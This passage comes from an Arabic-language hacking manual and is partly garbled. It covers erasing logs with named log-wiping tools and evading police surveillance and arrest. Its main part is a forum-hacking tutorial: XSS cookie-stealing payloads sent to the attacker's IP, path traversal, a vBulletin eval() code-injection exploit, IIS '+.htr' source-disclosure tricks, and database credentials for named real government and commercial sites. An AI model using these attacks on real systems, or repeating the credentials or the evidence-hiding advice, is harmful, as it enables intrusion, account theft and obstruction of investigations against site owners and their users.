اخريللتحقق ) ولكن یجبان تتاكدایضاان مل فقواعدالبیانات نفسها لایتمف حصها ب checksum 

حتي لایتم اكتشا فالتغییرات التيقمتبها)‏ 

( 

حیلالمستخدمالامنیه 

******************* 

هذه ال حیل ما ندرتوجداوتستخدملكنني كتبتهافقط لاكون شملتكل شئ ‏(لكمالالموضو ع ( ‏..فبع ض 

المستخدمین یسموناشتراكاتهم admins وبالطبع لا یریدونانیعبثفي ملفاتهماي شخ صفیقومون 

بعمل بع ضال حیلفي ملفاتال startupلذافدائماتحقق من .profile, .cshrc, .login, .logout 

الخ ‏(ايالملفات التيتبدابنقطه 

الجزء الخامس 

( 

: 

========= 

ماذاتفعلانوضعتتحتالمراقبه؟ 

*************************** 

متىاصحبتتحتالمیكروسكوب(‏ المراقبه منقبلالشرطهاو حتىال administratorsعلیكالقیام 

بخطوات هامه و سریعه حتى لایستطیعوالامساكبدلیل ‏(برهان 

‏-ملحوظه 

( علیك 

... 

‏:انكانفياعتقادال administrators انك hackerفانت == > مذنب حتىتثبتبراته 

لایعني القانوناي شئلل ( admins بع ضالاوقا تاعتقدانه لا یوجدفر قبینال hackerوال 

انكهاكر 

administratorالابان مالكالكومبیوتر هوال administratorفقط 

فانكفورااصبحت مذنب سیقومو مباشرةبمراقبةبریدك اللكتروني و ملفاتك وانكان محتر فالادمین 

سیرصدكایضا هجماتكالاخرى 

اذاكان یمكنهم مراقبةكل هذهالاتصالات اكید ببساطه یمكنهم مراقبة خطتیلیفونك 

لذا فعلیك عدمالقیامباي اتصالا تفیهااخباراخترقاتك .. وان حتىارد تانتحذراصحابكفلاتخبرهم 

هاتفیااو ببریدالكتروني ‏(الااذاكان مشفرا)‏ و منالافضلانتخبرهم عندماتقابلهم وجهالوجه 

تمنعهم من راسالاي رسائل غییر عادیه 

لتؤمن نفسك علیكانتبقى على هذا الحال علىالاقل من شهرالى شهرین .. والا ستواجه مشاكل اعتقد 

.. و 

( عندمایعتقدون 

.. 

.. 

.. 

.. 

٥٦




انكلاتر غ ببها 

الجزء السادس : 

========= 

ماالذي علیكالقیامبه وایضا الذي لابد من عدمالقیامبهفي حالةانهتم القب ض علیك:‏ 

************************************************** 

!!!! ‏:لات 

************** 

اولا ‏:اطلب محامیكفورا حاولبان تتذكىانت وترد علىالتحقیقبمفردك ‏..فاطلب محامیككي 

یدافع عنكهو و یطلعك على ما یجبانتذكره و ما یجبان لاتذكره نهائیا .. بعدها غالبا ما سیطلب 

المحامي جهازك ‏(الكومبیوتر ‏)باقصى سرعهب حجةاحتیاجهفيالعمل والا علیهمتحمیل جمیعالاعباء 

المادیه و المشاكل التيقدتحد ث عن عدكاستخدام الجهاز ‏..لذافانه من العملي جداان یكون عندك 

محامي جاهزفياي وقتقبلانتقع الفاسفيالراسو بعدهاتبدافي البح ث والتدویر 

ثانیا ‏:ابدا لا تتكلمالاالشرطه !!! : لاتعطيللشرطهايمعلومات عنكاو عن زملائكب حجةان هذا 

سیخف فالعقاب عنك و سیخرجك منالمازق ‏..لان هذالن یفیدكبل سیدینكاكثر .. وانكان یجب 

استجوابكفاطلبانیتم هذافقط من خلال محامیك ) و هذاایضا حق من حقوقك 

لاتخبرابدا عناصدقاؤكلیسققطكنو ع منالشهامه ‏..انماایضابدخولاصحابكفي الموضوع ست سع 

دائرة الموضو ع و منثمتزیدالمعلومات عنك و عن جرائمك و همایضا!‏ 

بع ضالدول من ضمنقانونهاانهاذالمتستطعالشرطهفكتشفیر ملفاتكاوجزء من الهارد دیسكفیمكنك 

بمنتهىالحریه عدمالافصاح عنها 

لكن بع ض الدولالاخر ىفيقانونهاانه مادامت وقعتفيالمصیده لابدانتدليلهم بكل شئفي هذه 

الحالهانص حكباستشارة محامیك وانكارانكلدیكاياقرا ص صلبه مشفره 

( 

الجزء السابع:‏ 

======== 

قائمهبافضلالبرامجللتخفي والاختباء:‏ 

****************************** 

Change - Changes fields of the logfile to anything you want 

Delete - Deletes, cuts out the entries you want 

Edit - real Editor for the logfile 

Overwrite - just Overwrites the entries with zero-value bytes. 

Don't use such software (f.e. zap) - it can be detected! 

--------------------------------------------------------------- 

LOG MODIFIER 

++++++++++ 

ah-1_0b.tar Changes the entries of accounting information 

clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx 

cloak2.c Changes the entries in utmp, wtmp and lastlog 

invisible.c Overwrites utmp, wtmp and lastlog with predefines values, 

so 

it's better than zap. Watch out, there are numerous inv*.c ! 

٥٧




marryv11.c Edit utmp, wtmp, lastlog and accounting data - best! 

wzap.c Deletes entries in wtmp 

wtmped.c Deletes entries in wtmp 

zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected! 

-------------------------------------------------------------------------------------- 

: 

========= 

كلمه ختامیه 

********** 

!! 

( 

.... 

الجزء الثامن 

لاتدعهمابدا یقبضون علیك .. دائمااجعل عیناك مفتوحان ‏..اعر ففي منتثق و من لا 

لاتفكرفي نفسكفقط ‏(انماایضاتذكركل من حولك 

تمنیاتيللجمیعب حیاة ممتعه وامنه 

٥٨




" 

حمایة 

" المنتدیات 

$$$$$$$$$$$$$ 

حقوقهلشبكةالعقرب 

$$$$$$$$$$$$$ 

الكلیعر فلغة php والتي یصممبهاالمنتدیات و الكلیعر فأیضاأنها ملیئةبالثغرات الكبیرة 

إلیك مدیرأي منتد ى ) vb ( بع ضالأساسیات التيیتمبها حمایة 

/ منتداك 

‎١‎‏-لاً‏ وقبلكل شيءالمدیرالعام ضع مدیرینإثنین واحدتكتبفیهالمشاركاتوتعدیلالمنتدى وكل شيء 

والآخر للإحتیاط عندما یسرق المدیرالعام . 

‎٢‎‏-ميلوحةالتحكم بكلمة سرأي إفتح مل ف index.php الموجودبمجلد adminبواسطةالمفكرة و 

أض ف علیهكودكلمةالسر الذي هو / 

 

معتغییركلمتي 

User 

و 

Password 

-٣ 

حقك لی س من 

غقائمةالأعضاءلماذا ؟؟ مثلالوكانلدیك ٣٠٠٠ عضو ووضعالزائرالكریمقائمةالأعضاءوقعد 

یفحطبهأصبح هناك ضغطكبیر علىالمنتد ىقدتسألونيلماذا لا نلغيقائمة الب ح ث ‏!!لأن البحثفي 

٥٩




النسخ الجدیدة یكون بأكثر منثلا ثأحر ف وبهذالن یكونهناكأي ضغ ط . 

٤ ‏-تكثر فتحلغة HTMLفي المنتدیاتأي إفتحهابمنتد ى واحدأوإثنینفقطلوجودالضرورة ‏..لماذا ؟؟ 

لأنه یوجدكود هتمل یفسد جمیعالمواضیع التيتعتمد على هذهاللغة 

. 

‎٥‎‏-توقیع و ماأدراك ماالتوقیع . إ جعلهفقط یخدمالصورأماالفلا ش و الصوتفلا .... 

٦٠



‏"أمن الشبكات"‏ 


$$$$$$$$$ 

الكاتب:الجوكر 

$$$$$$$$$ 

‎١‎‏-عر ضلبع ض المخاطرالأمنیة التيقد تتعر ضلها الشبكة وكیفیة الوقایة منها.‏ 

٢ ‏-وص ف لعلاقة الولوجالىالشبكة بأمنها.‏ 

٣ ‏-كیفیة حمایة المواردبواسطةتراخی صالوصول.‏ 

‎٤‎‏-شرحلمكونا ت ACL. 

‎٥‎‏-شرح لعملیةتفح صالتراخی ص.‏ 

أي شبكةقدتكونعرضةللوصول غیر المرخ صلأي مما یلي:‏ 

١- المعدات.‏ 

- ٣ البیانات.‏ 

- ٣ عملیاتالشبكة.‏ 

٤- الموارد.‏ 

تعتمد درجةأمن الشبكة على 

مدى حساسیةالبیانات المتداولة عبرالشبكة.‏ 

ویتمتنظیمالأمن وفقالنو ع الشبكة ‏،ففي شبكاتالندللندكل جهازیتحكمفيأمنهالخا ص ‏،بینمایتحكم 

المزودفيأمن شبكات الزبونالمزود.‏ 

و هناك بع ضالإجراءاتالتيتساعدفيالمحافظة علىأمنالشبكة:‏ 

١- التدریبالمتقنللمستخدمین على التعامل معإجراءات الأمن.‏ 

‎٢‎‏-التأكد منأمن المعداتوصعوبةالوصولالیها منقبل غیرالمخولین.‏ 

- ٣ حمایةالأسلاكالنحاسیة وإ خفاءها عن الأعینلأنهاقدتكون عرضةللتجسس.‏ 

‎٤‎‏-تشفیرالبیانا ت عندالحاجةأما مقاییسالتشفیر فتضعها وكالةالأمن الوطنيالأمریكیة National 

Security Agency (NSA). 

‎٥‎‏-تزویدالمستخدمین بأجهزة لاتحتوي على محركات أقرا ص مرنةأو مضغوطةأو حتى أقرا ص صلبة ، 

و تتصل هذه الأجهزةبالمزوداتباستخدام رقاقةإقلاع ROM Boot Chip و عندتشغیل هذه الأجهزة 

یقوم المزود بتحمیلبرنامجالإقلا عفي ذاكرة RAMللجهازلیبدأبالعمل.‏ 

٦١




‎٦‎‏-استخدامبرامج لتسجیل جمیعالعملیاتالتيیتمإجراؤها علىالشبكةلمراجعتها عند الضرورة.‏ 

٧ ‏-إعطاءتصاریح Permissionsللمستخدمینللوصولللبیانا ت و المعداتكل حسب طبیعة عمله و 

في هذه الحالة یجب مشاركةالبیانات و المعدا تللسماحللآخرینباستخدامها.‏ 

‎٨‎‏-تزویدالمستخدمینبحقو ق Rightsتحدد الأنشطة و العملیاتالمسموحلهمإجراءها علىالنظام.‏ 

هناك نظامانأساسیان لإعطاء التصاریح والحقوق 

- ١ المشاركةالمحمیة بكلمة مرور.‏ 

٢ ‏-تصاریح الوصول.‏ 

: 

في النظام الأولیتمتعیینكلمة سرلكل منالمواردالمطلوب 

منقبل منلدیهكلمةالسر.‏ 

مشاركتها ویتم الوصوللهذه المواردفقط 

كماتستطیعتحدید درجةالوصولهل هيللقراءةفقطأم وصولكاملأم وفقالكلمة السر.‏ 

في النظام الثانيیتمتعیینالحقوق وإعطاءالتصاریحلكل مستخدمأو مجموعة مستخدمین ، و یكفيأن 

یدخل المستخدمكلمة المرور عند الدخولالى نظام التشغیللیتعر ف النظام على حقوق هذا المستخدم و 

التصاریحالمتوفرةله،‏ ویعتبر هذاالنظامأكثرأمنا منالنظامالسابقویعطي مدیرالشبكةتحكماأكبر بكل 

مستخدم.‏ 

عندإدخالالإسم وكلمةالمروریتمتم ریر هذهالمعلومات الى مدیرأمن ال حسابات Security 

فإ ذاكانالولوجالى جهاز Workstationفإ نالمعلوماتیتم 

مقارنتها معقاعدةبیانات حساباتالأمنالم حلیةفيالجهاز،أماإ ذاكانالولوجالى نطاق Domainفإن 

المعلوماتیتمإرسالها الىمزود SAM الذي یقارنها معقاعدةبیانات حساباتالنطاق ‏،فإ ذاكاناسم 

المستخدمأوكلمةالمرور غیر صال حینفإ ن المستخدم یمنع منالدخولالىالنظام،أماإ ذاكانا ص حی حین 

فإن نظام الأمن الفرعي یقومبإ صداربطاقة ولوج Accessتعر Token فالنظامبالمستخدم فترة 

ولوجه وتحتوي هذه البطاقة على المعلوماتالتالیة : 

Accounts Manager (SAM) 

-٢ 

- ١ المعر ف الأمني (SID) Security Identifier وهو رقمفرید خا ص بكل حساب.‏ 

معرفات المجموعة Group SIDs وهي التيتحددالمجموعة التي ینتميلهاالمستخدم.‏ 

‎٣‎‏-ا لإمتیازا ت Privileges و هيتمثل الحقوق الممنوحةل حسابك.‏ 

كماأنهیتمإ صدار Access Token عند محاولتكالإتصال من جهازكبجهاز آخر على شبكتك و یطلق 

على هذاالإجراءالولوج عن بعد Logon. Remote 

منالأمورالتي یجب مراعاتها عندالحدیث عنأمنالشبكةهوالمحافظة علىأمنالموارد مثلالطابعا ت و 

محركاتالأقرا ص و الملفات و التي یقو م مدیرالشبكة بتعیینتصاریح لإ ستخدام هذهالموارد.‏ 

و من التصاریح التيقدتعطىللوصول الى الملفات ما یلي : 

٦٢




‎١‎‏-تصریحقراءة و یسمحلك بعر ض و نسخالملفا ت.‏ 

‎٢‎‏-تصریحتنفیذللتطبیقا ت.‏ 

‎٣‎‏-تصریح كتابة و یسمحبالتعدیلفي محتو ى الملفا ت.‏ 

٤- ممنوع ا لإ ستخدام Access. No 

والتصاریح ممكن منحهالمستخدمأو مجموعة منالمستخدمین و هذاأٍ‏ سهل.‏ 

یمتلككل مورد من المواردقائمةتحكمبالوصول (ACL) Access Control List وكلمعلومةیتم 

إدخالهافي ACLیطلق علیها (ACE). Access Control Entry 

یتمإنشاء ACE عند منحالتصریح لإ ستخدامالمورد وتحتوي على SIDللمستخدمأو مجموعته 

الممنوحةالتصریحبالإ ضافة الى نو عالتصریح،فلو افترضناأن مدیر مجموعة ماقد مُنحتصریحقراءة و 

تصریح كتابةلمل ف مافإن ACE جدیدیتمإنشاؤهثمإ ضافتهالى ACL الخا صبالمل ف و سیحتوي 

ACEعلى SIDلمدیرالمجموعةبالإ ضافةالىتصریحقراءة وتصریح كتابة.‏ 

هناك نوعان ل : ACE 

‎١‎‏-الوصول مسمو ح AccessAllowed. 

٢- الوصول ممنو ع AccessDenied ویتمإنشاؤهاإ ذاكانتصریحالوصول هو Access. No 

و هكذا عندما یحاول مستخدم ماالوصولالى مورد مایتم مقارنة SID الخا صبه مع SIDsفيكل 

ACEمن ACLللمورد.‏ 

في ویندوز NT و ویندوز ‎٢٠٠٠‎یتمترتیب ACEب حی ثتكون AccessDeniedقبل ACEs 

فإ ذا وجد SID 

فستمنع من الوصول الىالمورد وإلافسیبحثفي AccessAllowedللتأكد ACEs منالحقوق 

الممنوحةلكفإنلم یعثر على SID مطابقلخاصتكفستعر ض رسالةتحذیرتمنعك منالوصولللمورد.‏ 

خاصتكفيأي من AccessDenied ACEs 

AccessAllowed ACEs ، 

ملخ صالدرس:‏ 

هناك بع ضالإجراءات التي یجب اتخاذهاللمحافظة علىأمن الشبكة و منها:‏ 

تدریبالمستخدمین ، حمایة المعدا ت ‏،تشفیرالبیانا ت ‏،استخدامأجهزة عدیمة الأقرا ص ، مراقبةالعملیات 

التيتجرى علىالشبكة.‏ 

هناك نظامانأساسیان لإعطاءالتصاریح والحقوق 

١- المشاركةالمحمیة بكلمة مرور.‏ 

٢ ‏-تصاریح الوصول...‏ 

: 

٦٣




‏"درس مفصل عن كیفیة اختراق المنتدیات وطرق حمایتها"‏ 

$$$$$$$$$$$$$$ 

الكاتب:العقرب الأحمر 

$$$$$$$$$$$$$$ 

الدرسیتكون من ٧ نقاط 

ا-لمنتدیات وانواعه 

طریقةاختراقه 

‎٣‎‏-أختراق ال 

سرفراتالویندوز ودورهفياختراق المنتدیات 

‎٥‎‏-النسخه المنتشرهفي النت ودورالمعربین العرب وحقیقةالموضو عوتعریبهم 

٦ ‏-الحمایه منالمخترقینبنسبة 80% لااجهزتكم ومنتدیاتكم 

- ٧ المجلهبجمیع نسخهقابل لاال ختراق 

SQL 

١ 

-٢ 

-٤ 

الدروس جمیعهابالصورة وحقائق ودلائل 

قمت بتجمیع الدروس والاضافتة علیهوتعدیله‎100%‎ 

ارجو عدم نقلالدروس وكوبي 

************************************************************************* 

١- المنتدیات وانواعه 

^^^^^^^^^^^^^ 

٢ 

المنتدیاتاولا منتدیات جون Poweredبجمیعاصداراته by: vBulletin 

‎١‎لماذالم یخترقاحدي منتداهم حتيالان 

الایوجدلهم ملیون عدو 

‎٣‎الایخترقون عشراتالمنتدیات یومیا ولماذالیس منتدي جون وحمایتهتصلالي ‏%‏‎60‎في السرفر 

تفضل هذاثغراتبموقعهماشوي شغلكمانتصللقلبهم لاارید التطویلالانبس مثاللمن یفهمه 

http://www.vbulletin.org/index.php?topic= 

alert(document.cookie) 

2 

http://www.vbulletin.org/index.php? 

|=forum/view.php&topic=../../../../../../../etc/passwd 

٦٤




****************************************************************************** 

طریقةاختراقه 

^^^^^^^^^ 

جمیعالاصدارات 

فلنبدي من صفر نسخة ١١٣ بتذكرو یمكن بعضكم 

كلنانعر ف منتدیات الفيبي ، وهذا النو ع من المنتدیات یحب یركبهقلیلین الخبرهفيأغلب الأحیان ، وهذا 

-٢ 

المنتد ى هوالمعرو ف عندناالعرب بكثره 

الأول اللي كتبهالفرنسي ‏(على ماأعتقد ) Jouko Pynnonen 

) is a commonly used web forum http://www.vbulletin.com/vBulletin ( 

system written in PHP. One of its key features is use of templates, 

which allow the board administrator to dynamically modify the look of 

the board. 

vBulletin templates are parsed with the eval() function. This could be 

somewhat safe as long as the parameters to eval() are under strict 

control. Unfortunately this is where vBulletin fails. With an URL 

crafted in a certain way, a remote user may control the eval() 

parameters 

and inject arbitrary PHP code to be executed. 

A remote user may thus execute any PHP code and programs as the 

web 

server user, typically "nobody", start an interactive shell and try to 

elevate their privilege. The configuration files are accessible for the 

web server so the user can in any case access the MySQL database 

containing the forums and user information. 

According to the authors the vulnerability exist in all versions of 

vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer 

overrun or other platform-dependant issues, so it's presumably 

exploitable under any OS or platform. 

DETAILS 

======= 

vBulletin templates are implemented in the following way: the 

gettemplate() function in global.php is used to fetch a template from 

٦٥




database. The code is then passed to eval(). If we take index.php for 

an example, there's this code: 

if ($action=="faq") { 

eval("echo dovars(\"".gettemplate("faq")."\");"); 

} 

The dovars() function does some variable replacing, such as replace 

with . 

The gettemplate() function is defined in global.php: 

function gettemplate($templatename,$escape=1) { 

// gets a template from the db or from the local cache 

global $templatecache,$DB_site; 

if ($templatecache[$templatename]!="") { 

$template=$templatecache[$templatename]; 

} else { 

$gettemp=$DB_site->query_first("SELECT template FROM template 

WHERE title='". addslashes($templatename)."'"); 

$template=$gettemp[template]; 

$templatecache[$templatename]=$template; 

} 

if ($escape==1) { 

$template=str_replace("\"","\\\"",$template); 

} 

return $template; 

} 

For effectiveness the function implements a simple cache for template 

strings. After fetching them from the database they're stored in the 

templatecache[] array. This array is checked for the template before 

doing the SQL query. Unfortunately the array is never initialized, so 

a user can pass array contents in the URL, e.g. 

(for simplicity not %-escaped) 

٦٦




http://www.site.url/index.php?action=faq&templatecache 

[faq]=hello+world 

With this URL, you won't get the FAQ page, but just a blank page 

with the words "hello world". 

The eval() call above will execute 

echo dovars("hello world"); 

As if this wouldn't be bad enough, a remote user may as well pass a 

value containing quotation marks and other symbols. Quotation marks 

aren't always escaped as seen in the code above, in which case 

index.php could end up executing code like 

echo dovars("hello"world"); 

This would produce a PHP error message due to unbalanced quotes. It 

doesn't take a rocket scientist to figure out how a remote user could 

execute arbitrary code from here, so further details about exploitation 

aren't necessary. If your vBulletin board produces an error message 

with an URL like the one above prefixed with a single quotation mark, 

it's definitely vulnerable. 

The above example works with the "Lite" version. The commercial 

versions 

are vulnerable too, but details may differ. After a little experimenting 

on the Jelsoft's test site I found some of the commercial versions also 

have an eval() problem with URL redirecting, e.g. 

"world http://www.site.url/member.php?acti...ypass&url=hello 

and a similar one in the Lite version: 

http://www.site.url/search.php?acti...s&templatecache 

[standardredirect]=hello"world 

تعرفونالكلام هذا ولا داعي لترجمه ، منالكلام هذاأنت ممكنترسلأكواد خل ف urlتنفذفيالسیرفر ، 

تضعهابدل الكلمه hello+world الغبیه ‏،جرب مثلا 

: 

١- ركبفي جهازك ملقم ویبأي ملقمتحبه ممكنتركب علیه vb 113 or 115 

٩٠ عندكفي جهازك ‏(طریقه فت حالبورتتكون على مجازك ( 

٣ ‏-أرسل ال url هذا الىالسیرفر 

٢- أفتحالبورت 

٦٧




search.php3?action=simplesearch&query=searchthis&templatecache[s 

tandardredirect]="%29%3B%24fa="




وأعذروني علىالإملاء والنحو 

ملاحظهأخیره : وهي عند ماتشبك معالسیرفر عن طریقالبورت ‎٩٠‎أرسل 

-d downloads 

تنزللكالداتبی سكلها ، وللأس ف طلعت غیر مشفره وهذا یدل علىالتخل ف ، ولكنفي الإ صداره‎٢٫٢‎ x 

شفرت ولكنكسرتها وقریبا أقوللك عنها 

تم شرح طریقة الاختراق من ‎١١٣‎الي ١١ 

طریقةاخترا ق من ‎١١٥‎الي ٢٢٥ 

المتطلبا ت)‏ WebServer ‏:تركیب سیرفر على جهازكالشخصي)‏ + متصفحانترن ت)‏ اكسبلورر)‏ . 

المستوى : متوسط 

ملاحظة : هذهالطریقةلس تلل vBulletinفقط ‏!!یمكنانتجربها علىانواعاخرى من المنتدیات 

. 

---------- 

: 

--------- 

الثغرة 

تنقسم طریقةالعملالى عدةاقسام ‏..أولا بع ض السكربتاتالخبیثةالتيتسرقالكوكیزبالاضافةالىجعل 

المنتدى یستقبل 

بیانات من مكان خاطيء ‏..لكن یشترطان یسمح المنتد ى بأكواد ال .. HTML 

قم بكتابة موضو ع جدیداو رد 

هذا الكود 

‏(في منتد ى یدعمال .. ) HTMLثماكتباي موضو ع والص قبینالسطور 

: 

document.write(''; 

مع ملاحظةتغیرال IP Adress الى رقمال IP الخا صبك . 

. ( 

وعندما یقوم شخ ص ما بقراءة محتو ىالصفحةفانالسكربتالذيقمنابوضعه سیقوم بتنفیذالاوامرفي 

جهازه وقراءةجزء مناحد ملفاتالكوكیزالتيتحتوي علىالباسورد الخاصةبالمنتدى ‏..ثم یقوم 

السكربت بتحویل هذهالسطورالى رقم الايبيالذيقمنا بكتابته سابقا ‏(مع ملاحظةانه یجبان یكون على 

جهازي سیرفر مثل IIS او غیرها 

او Apache 

وبعدان تتمالعملیةبنجاحقم بفتح مل فال Log الخا صبالسیرفر الذي یحتویه جهازك 

مثاللوكانالسیرفراباتشي 

ستجد جمیعالاوامرالتي طلبتها منالسیرفر ‏..إلخ 

.. 

.. فتاح المجلد Apche واختر logs واختر . Log Acces 

اب حث عنالكودالخا 

صبالباسورد 

: مثال 

.. 

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb 

٦٩




ddf90622;%20sessionhash=a 

4719cd620534914930b86839c4bb5f8;%20bbthreadview[54 

20]=1012444064;%20bblastvi 

sit=1011983161 

فكرقلیلاالان ‏..این الباسورد ؟؟ 

الباسورد موجودةلكنبطریقة مشفرة یصعبكسرها ‏..اذن مالحل ؟ 

قمبنسخالكود الذي وجدته والصقهفيالمتصفح ‏..بهذا الشكل 

http://www.victim.com/vb/index.php?bbuserid= 

[userid]&bbpassword=[password hash] 

ستجد عبارة : ‏"أهلا بعودتك یا ‏(اسمالذي سرقت منهالكوكیز....)‏ " 

في هذه الحالةانتالانتستطیع التحكم بكل شي وكانك مدیرالمنتدى الذي سرقت 

لكننا نحتاج الىكلمة المرورللدخولالىلوحة التحكم ‏..اذهب الى التحكم)‏ وقم بتعدیلالبریدالالكتروني 

الىبریدك الخا ص وثمقم بتسجیل الخروج 

تستطیعاستقبالبرید یحتويباسوردالادمن 

) منهالكوكیز)‏ .. 

) 

‏..ثماذهب الىاداة .. Password Forgot وعندها 

.. 

********************************************************************************** 

SQL 

^^^^^^^^^^^^^ 

‎٣‎‏-أختراق ال 

: 

یمكنكاستخدامبرنامجالعقرببیكوناسرعلمنلدیه نسخ منه 

س فيالبدایة ماهيالاسكیوال(‏ ( SQL ؟؟ 

الاسكیوال هي عبارة عنقاعدبیاناتتحتوي على جداول واغلب المواقعالتيتكون صفحاتها منتهیة ب 

ASPهي صفحا تتسحببیاناتها منقاعدة SQLوصفحات ASP ممكنانتكونكنز منالمعلومات 

لاختراققواعدبیانات SQL وهذا ماسو ف اشیرالیه لاحقا ، و SQL تتنصت علىالبورت ١٤٣٣ 

ایضا مااریداناخبركبهانال SQLقدتحتوي على اكثر منقاعدةبیانات وكلقاعدةبیاناتتحتوي 

على عدد من الجداول یمكن ان تتصوركبرقواعدبیانات SQL والعددالكبیر منالبیانات التىتحتویها 

س مالذي یمكناناستفید منهاذااخترقتقاعدةبیانات SQL؟ 

هذا على حسب نشاطالموقعاذاكان هذا الموقع منتد ى لااقصد منتدیات PHPبل منتدیات ASPفي 

الغالب سو فت حصل على جمیعاسماء 

المستخدمین وكلماتالسر وبامكانكتعدیل وحذ فاي موضوع وصلاحیاتلمتكنت حلمبها ‏،امااذاكان 

الموقع یحتوي على میزة 

قائمةالمراسلا تفسو فت حصل علىاعداد خیالیة منالایمیلات ، عندهاقمبانشاء شركةللدعایة والاعلان 

وسو فتصبحثریااذنلاتنسى LinuxRay_ 

توقعانتجد اي شئ داخلقواعدبیاناتمعلوماتاشخا ص ‏-ارقام هوات ف 

. 

- عناوین ‏-تورایخالمیلاد ، 

ممكنانتصبح . Administrator 

: 

اعر فانهقداصابك المللالانلكناستعد نشاطك من جدیدفالطریق مازال طویلا 

س مالذيتحتاجةللدخول علىقواعدبیانات SQL؟ 

... 

: 

تحتاجفقطلل User Name و Passwd 

س 

: منایناحصل علىاسم المستخدم وكلمةالمرور ؟ 

٧٠




هناك طرق عدیدةلل حصول على User name and Passwd منهاكمااسل ف صفحاتال ASP 

وملفاتاخرى من نو ع sql‏.*هناكثغراتكثیریمكن 

انت حصل منها علىكلمات المرور مثلثغرة +.htr 

كی فتستخدم هذهالثغرة : 

http://target/page.asp+.htr 

: targetالموقعالهد ف 

asp صفحة Page : 

: htr‏.+الثغرة 

هذه الثغرةتقوماحیانا بفتح صفحةبیضاء لاتحتوي علىاي حر ف ‏....اعر فانك سوف تتساءل مالفائدة 

اذن منهاالفائدة هو خل ف هذهالصفحةالبیضاءاذهب الى Viewلكيتر Source ىاوامرالبرمجة 

الخاصة ب ASP التى لایمكنلكانتراهافي الوضع العادي مثل 

: 

Set DB= Server.CreateObject("ADODB.Connection") 

DB.Open "DRIVER=SQL 

Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer 

Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666" 

< % 

%> 

------------------------------------------------------------------ 

في الكودالسابقترىاناسم المستخدمهو _LinuxRay 

وكلمة السرهي ٦٦٦٦٦٦٦ 

------------------------------------------------------------------ 

الشئالمضحكانهاحیانااذاكان هناك خطأفي صفحةال ASP مثلالاتي : 

AMicrosoft VBScript runtime error '800a01a8' 

Object required: 'Conn' 

/filename.inc, line 5 

هناك مل ف ینتهيبامتداد *.inc هذا ملف یحتوي علىاوامریتمتنفیذها من جانبالملقم ویحتوي علىاسم 

المستخدم وكلمة المرور 

اذن ماذاتنتظرقمبسحب هذا المل ف وذلكباضافةاسمالمل ففي عنوان الموقع . 

وممكنانتر ى مثل هذاالامرفي صفحة ASP 

٧١


عندتطبیقالثغرة علیها هذایعنياناوامرالبرمجة داخل مل ف database.inc 

 

وهناك عدة ملفاتتحتوي علىكلمةالمرور مثل ملفات 

global.asa 

++global.asa 

beforemilion-global.asa 

-global.asa 

milion.sql 

global-direct.asa 

لی س منالضرورةانتكونالملفاتبهذهالاسماءلكن هذا هوالمعتاد علیه منقبل مبرمجین SQL 

وكل 

ماعلیكفعلهانتكتباسمالصفحة مثلالاتي : 

global.asa+.htr 

هناكثغرةقدیمةفي IIS 3 وهيانتضی ف بعد صفحة ASP هذاالرمز data‏$::كما یلي 

file.asp::$data 

هذه الثغرةلاتعملالا على IISفلا 3 تتعب نفسك بتطبیقهافقطللعلم لا اكثر . 

لقداقتربنا من النهایة 

... ماذا بعدال حصول علىاسم المستخدم وكلمة المرور ؟؟ 

بعدهاالدخول علىقاعدةال !! SQL 

هناك عدةبرامجتدخل علىقاعدةالبینا تانااستخدم Visualلكني interdev 6.0 مازلت افضل 

استخدام البرنامجالسهل ACCESS 2000 

كل ما علیك فعلههو فتح البرنامح الذهاب الىقائمة 

File 

اختر 

New 

ومنقائمةالملفات الجدیدةاختار 

. 

Project (Exiting Data) 

اي مشرو عقاعدةبیانات موجودة 

سیظهرلك مربع لانشاء الملفاختر 

Create 

٧٢



ايانشاء 


الان ستر ى مربع 

Data Link Properties 

تحتاجفق طلثلا ثمعلوما تاسم الموقعاوالايبي ‏-اسمالمستخدم ‏-كلمة المرور 

‎١‎‏-ادخلاسمالموقعفي صندو ق Select or enter server name 

‎٢‎‏-اسمالمستخدمفي User Name 

‎٣‎‏-كلمة السر Password 

ملاحظة ‏(قم بإزالةالصح من مربع Password) Blank 

اضغطفي البدایة على Testفيالاسفل Connection لاختبارالاتصال بقاعدة البیانا تاذا رأیت هذه 

العبارة Test Connection Succeeded 

فمعناهانالاتصال بقاعدةالبیاناتتمبنجاح.‏ 

یمكنكالانانتختارايقاعدةبیاناتترید الدخول الیها منالقائمةالمسندلة 

: 

Select the data base on the server 

واضغط على OK او موافق . 

فئ رانالتجارب 

موقع 

: 

http://www.moe.gov.sa/ 

‏-‏‎1‎قمبالدخول علىالصفحة التالیة : 

http://www.moe.gov.sa/news_admin.asp 

سترى مایلي 

Microsoft VBScript runtime error '800a01a8' 

Object required: 'Conn' 

/news_admin.asp, line 7 

ثم طب ق علیهاثغرة htr كتالي:‏ 

http://www.moe.gov.sa/news_admin.asp+.htr 

٧٣




اذهبالى السورس لترى 

< ! --#include file = "database.inc"--> 

قمبسحب 

ملف database.inc كتالي:‏ 

http://www.moe.gov.sa/database.inc 

سو فترى مایلي 

Set DB= Server.CreateObject("ADODB.Connection") 

DB.Open "DRIVER=SQL 

Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer 

Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321" 

: 

 

هلتعر ف مالذيامام عینكالانانهاسم المستخدم وكلمةالمرور 

انااعر فان لااحد یحب مادة 

الكیمیاء . 

..... سار عبالتشبیك علىقاعدةالبیانات 

فأرالتجارب الثاني 

موقع 

http://www.itsalat.com/ 

1 - User name : sa Passwd : sp2000 

: 

******************************************************************************** 

-٤ 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 

سرفراتالویندوز ودورهفياختراق المنتدیات 

ن حن الهكرز واي هكرز مبتديیعر فثغرات الویندوز جیدا دا 

وهي نظامفاشل ٨٠% وثغراتهبالاالو ف 

ولاانصحايا خلدیه منتدي وموقع یستضیف سرفرات ویندوز راحاقلكملی شبااثبتات 

صور‎٢‎ هو صورةلجمعیةامریكي مهم وحجمقاعداتالبیانات ‎١٫٥‎كیكیعني 15000 

خمسة ملین مشتركتماختراقهالبارحهبنفسي جاريتحمیل الموقعلجاهزيكاملا 

میك ویحتوي علي 

